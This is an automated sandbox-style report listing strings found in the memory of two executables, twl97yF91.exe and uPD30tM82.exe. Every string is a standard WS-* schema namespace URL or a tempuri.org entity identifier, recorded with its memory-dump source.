                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm8D
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000005105000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000005199000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000005105000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14V
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000005173000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: twl97yF91.exe, 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, twl97yF91.exe, 00000001.00000002.323169357.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.0000000002641000.00000004.00000800.00020000.00000000.sdmp, uPD30tM82.exe, 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
